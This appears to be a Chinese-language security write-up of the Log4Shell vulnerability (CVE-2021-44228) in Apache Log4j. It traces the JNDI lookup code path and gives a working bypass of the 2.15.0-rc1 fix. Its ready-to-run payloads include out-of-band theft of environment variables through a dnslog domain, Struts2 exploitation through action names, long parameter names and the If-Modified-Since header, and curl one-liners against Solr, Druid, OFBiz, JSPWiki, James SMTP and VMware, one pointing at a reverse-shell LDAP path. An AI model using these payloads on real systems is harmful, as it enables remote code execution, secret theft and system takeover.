2021 年 12 月 10 日,Apache发布了其 Log4j 框架的 2.15.0 版,其中包括对 CVE-2021-44228 的修复,这是一个影响 Apache Log4j 2.14.1 及更早版本的关键 (CVSSv3 10) 远程代码执行 (RCE) 漏洞。该漏洞存在于 Log4j 处理器处理特制日志消息的方式中。不可信的字符串(例如,来自输入文本字段的字符串,例如 Web 应用程序搜索框)包含的内容${jndi:ldap://example.com/a}
,如果启用了消息查找替换,将触发远程类加载、消息查找和相关内容的执行。成功利用 CVE-2021-44228 可以让未经身份验证的远程攻击者完全控制易受攻击的目标系统。
Log4j是Apache的一个开源项目,通过使用Log4j,我们可以控制日志信息输送的目的地是控制台、文件、GUI组件,甚至是套接口服务器、NT的事件记录器、UNIX Syslog守护进程等;我们也可以控制每一条日志的输出格式;通过定义每一条日志信息的级别,我们能够更加细致地控制日志的生成过程。
Lookup提供了一种在任意位置向 Log4j 配置添加值的方法。它们是实现StrLookup
接口的特定类型的插件。Lookup语法为${prefix:name}
,其中前缀标识告诉Log4j应在特定上下文中使用的变量名称。
前缀
上下文
bundle
资源束。格式为bundle:BundleName:BundleKey。捆绑包名称遵循包命名约定,如:{bundle:com.domain.Messages:MyKey}。
ctx
线程上下文映射(MDC)。
date
使用指定的格式插入当前日期和/或时间。
env
系统环境变量。
jndi
在默认的JNDI上下文中设置的值。
jvmrunargs
通过JMX访问的JVM输入参数,但不是主要参数; 请参阅RuntimeMXBean.getInputArguments在Android上不可用
log4j
Log4j配置属性。表达式log4j:configLocation
和log4j:configLocation
和{log4j:configParentLocation}
分别提供给log4j的配置文件和它的父文件夹的绝对路径。
main
使用 MapLookup.setMainArguments(String[])设置的值。
map
来自MapMessage的值。
sd
来自StructuredDataMessage的值。“id”将返回没有企业号的StructuredDataId的名称。“type”将返回消息类型。其他键将从Map中取回单个元素。
sys
系统属性。
选用log4j-core 2.14.1版本,使用以下代码作为demo。启动一个恶意的RMI或LDAP服务,执行demo即可触发。
`import org.apache.logging.log4j.Logger; import org.apache.logging.log4j.LogManager; public class Log4jJNDI { private static final Logger logger = LogManager.getLogger(Log4jJNDI.class); public static void main(String[] args) { System.setProperty("com.sun.jndi.rmi.object.trustURLCodebase", "true"); System.setProperty("com.sun.jndi.ldap.object.trustURLCodebase", "true"); logger.error("${jndi:rmi://127.0.0.1:8888/Calc}"); } } `
跟进到org.apache.logging.log4j.core.pattern.MessagePatternConverter#format
,若未设置nolookup
为true,遍历要输出的日志,$
符号和{
符号相继出现则会在后续将花括号中的内容作处理。nolookup
在log4j 2.15.0之前是默认关闭的。
再跟进到org.apache.logging.log4j.core.lookup.StrSubstitutor#substitute
,在这里会从外到内递归${
和}
内的内容,然后使用图中的resolveVariable
方法解析并返回它的值。
在resolveVariable
方法里支持解析的前缀有date, java, marker, ctx, lower, upper, jndi, main, jvmrunargs, sys, env, log4j
,实测在Spring框架下支持解析的前缀会有所不同。
继续跟进org.apache.logging.log4j.core.lookup.Interpolator#lookup
,根据前缀从strLookupMap
属性中获取相应的Lookup类实例。这里获取的是JndiLookup
的实例,并调用该实例的lookup
方法。
JndiLookup
的lookup
方法里,调用org.apache.logging.log4j.core.net.jndiManager
的getDefaultManager
静态方法,返回JndiManager
实例,其中的context
属性被设置为InitialContext
对象。
然后调用JndiManager
实例的lookup
方法,实际就是它的context
属性InitialContext
的lookup
方法,后续流程就如常规JNDI注入,加载远程的恶意类执行其中的恶意代码。
log4j在RC1中对JNDI注入问题的修复存在于github的commit记录LOG4J2-3201中。在JndiManager
类里对反序列化的类和JNDI服务器地址做了白名单校验。
`public synchronized <T> T lookup(final String name) throws NamingException { try { URI uri = new URI(name); if (uri.getScheme() != null) { if (!allowedProtocols.contains(uri.getScheme().toLowerCase(Locale.ROOT))) { LOGGER.warn("Log4j JNDI does not allow protocol {}", uri.getScheme()); return null; } if (LDAP.equalsIgnoreCase(uri.getScheme()) || LDAPS.equalsIgnoreCase(uri.getScheme())) { if (!allowedHosts.contains(uri.getHost())) { LOGGER.warn("Attempt to access ldap server not in allowed list"); return null; } Attributes attributes = this.context.getAttributes(name); if (attributes != null) { // In testing the "key" for attributes seems to be lowercase while the attribute id is // camelcase, but that may just be true for the test LDAP used here. This copies the Attributes // to a Map ignoring the "key" and using the Attribute's id as the key in the Map so it matches // the Java schema. Map<String, Attribute> attributeMap = new HashMap<>(); NamingEnumeration<? extends Attribute> enumeration = attributes.getAll(); while (enumeration.hasMore()) { Attribute attribute = enumeration.next(); attributeMap.put(attribute.getID(), attribute); } Attribute classNameAttr = attributeMap.get(CLASS_NAME); if (attributeMap.get(SERIALIZED_DATA) != null) { if (classNameAttr != null) { String className = classNameAttr.get().toString(); if (!allowedClasses.contains(className)) { LOGGER.warn("Deserialization of {} is not allowed", className); return null; } } else { LOGGER.warn("No class name provided for {}", name); return null; } } else if (attributeMap.get(REFERENCE_ADDRESS) != null || attributeMap.get(OBJECT_FACTORY) != null) { LOGGER.warn("Referenceable class is not allowed for {}", name); return null; } } } } } catch (URISyntaxException ex) { // This is OK. } return (T) this.context.lookup(name); }`
但这个修复存在问题,如果new URI(name)
抛出了URISyntaxException
异常,则会跳过白名单校验直接调用lookup
。URI加不编码的空格可以触发URISyntaxException
跳出try catch
直接执行lookup,但在lookup
里会去掉空格,正常触发JNDI注入。
`${jndi:ldap://127.0.0.1:1389/ badClassName} `
log4j中的两个前缀sys
和env
,是分别通过System.getProperty()
和System.getenv()
实现的,能够获取环境变量和系统属性,再配合Out-of-Band
,就能读取到环境变量和系统属性中的敏感信息。
POC
`${jndi:ldap://${env:USER}.dnslog.cn/abc} `
bundle前缀ResourceBundleLookup
中会把 key 按照 :
分割成两份,第一个是 bundleName 获取 ResourceBundle,第二个是 bundleKey 获取 Properties Value。
bundle前缀在只引入log4j的项目上默认不支持,测试在spring框架里支持。
POC
`${jndi:ldap://${bundle:bundleName:bundleKey}.ed7yce.dnslog.cn/abc} `
在struts2-core包的org.apache.struts2.dispatcher.mapper#cleanupActionName
中,检查action名的范围是否在[a-zA-Z0-9._!/\-]
内,若存在访问之外的字符,则会将action名输出到WARN日志中。
`protected String cleanupActionName(String rawActionName) { if (this.allowedActionNames.matcher(rawActionName).matches()) { return rawActionName; } else { LOG.warn("{} did not match allowed action names {} - default action {} will be used!", rawActionName, this.allowedActionNames, this.defaultActionName); return this.defaultActionName; } } `
在请求路径中两个相邻的/
会被转换为一个/
,将其中一个/
替换为${::-/}
可防止被转换。
有的struts2版本的相同类中还存在cleanupNamespaceName
方法,利用方式相同。
POC
`http://localhost:8080/helloworld_war/$%7Bjndi:rmi:$%7B::-/%7D/127.0.0.1:8888/Calc%7D/ `
在struts2-core包的com.opensymphony.xwork2.interceptor#isWithinLengthLimit
中,访问一个存在的action,会检查请求参数名的长度,若长度超过默认的100个字符,请求参数名则会输出到debug日志中。
`protected boolean isWithinLengthLimit(String name) { boolean matchLength = name.length() <= this.paramNameMaxLength; if (!matchLength) { LOG.debug("Parameter [{}] is too long, allowed length is [{}]", name, String.valueOf(this.paramNameMaxLength)); } return matchLength; } `
POC
`http://localhost:8080/helloworld_war/hello.action?$%7Bjndi:rmi://127.0.0.1:8888/Calc%7Daaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa=123 `
struts2在org.apache.struts2.dispatcher.filter.StrutsPrepareAndExecuteFilter#doFilter
拦截一个请求,且请求的路径不在排除的路径内,则会先调用execute
属性的executeStaticResourceRequest
方法,判断是否为静态文件。
在org.apache.struts2.dispatcher.ExecuteOperations#executeStaticResourceRequest
里,请求以struts
或static
开头则会交给DefaultStaticContentLoader
的findStaticResource
处理。
findStaticResource
方法中,静态文件会从struts2 core的org.apache.struts.static
包下找,然后会交给同类的process
方法处理。该包存在以下静态文件。
tooltip.gif
domtt.css
utils.js
domTT.js
inputtransfersselect.js
optiontransferselect.js
process
方法里,静态文件输入流非空时,则会尝试将请求头If-Modified-Since
的值转为Date类型,当转换失败抛出异常,If-Modified-Since
的值就会输出到WARN日志中。
我们访问struts2中默认的静态文件,并设置If-Modified-Since
头为非Date类型即可触发log4j漏洞。
POC
`curl -vv -H "If-Modified-Since: \${jndi:rmi:\${::-/}/localhost:8888/Calc}" http://192.168.217.1:8080/helloworld_war/struts/utils.js `
`curl --insecure -vv -H "X-Forwarded-For: \${jndi:ldap://10.0.0.3:1270/lol}" "https://10.0.0.4/websso/SAML2/SSO/photon-machine.lan?SAMLRequest=" `
`curl 'http://localhost:8983/solr/admin/collections?action=${jndi:ldap://xxx/Basic/ReverseShell/ip/9999}&wt=json' curl 'http://localhost:8983/solr/admin/cores?action=CREATE&name=$%7Bjndi:ldap://10.0.0.6:1270/abc%7D&wt=json' `
`echo 233 > email.txt curl --url "smtp://localhost" --user "test:test" --mail-from '${jndi:ldap://localhost:1270/abc}@gmail.com' --mail-rcpt 'test' --upload-file email.txt`
`curl -vv -X DELETE 'http://localhost:8888/druid/coordinator/v1/lookups/config/$%7bjndi:ldap:%2f%2flocalhost:1270%2fabc%7d' `
`curl -vv http://localhost:8080/JSPWiki/wiki/$%7Bjndi:ldap:$%7B::-/%7D/10.0.0.6:1270/abc%7D/ `
`curl --insecure -vv -H "Cookie: OFBiz.Visitor=\${jndi:ldap://localhost:1270/abc}" https://localhost:8443/webtools/control/main `
https://www.docs4dev.com/docs/zh/log4j2/2.x/all/manual-lookups.html
https://mp.weixin.qq.com/s/vAE89A5wKrc-YnvTr0qaNg
https://lorexxar.cn/2021/12/10/log4j2-jndi/#2-15-0-rc1-%E7%9A%84%E4%BF%AE%E5%A4%8D
https://xz.aliyun.com/t/10649#toc-2
https://attackerkb.com/topics/in9sPR2Bzt/cve-2021-44228-log4shell/rapid7-analysis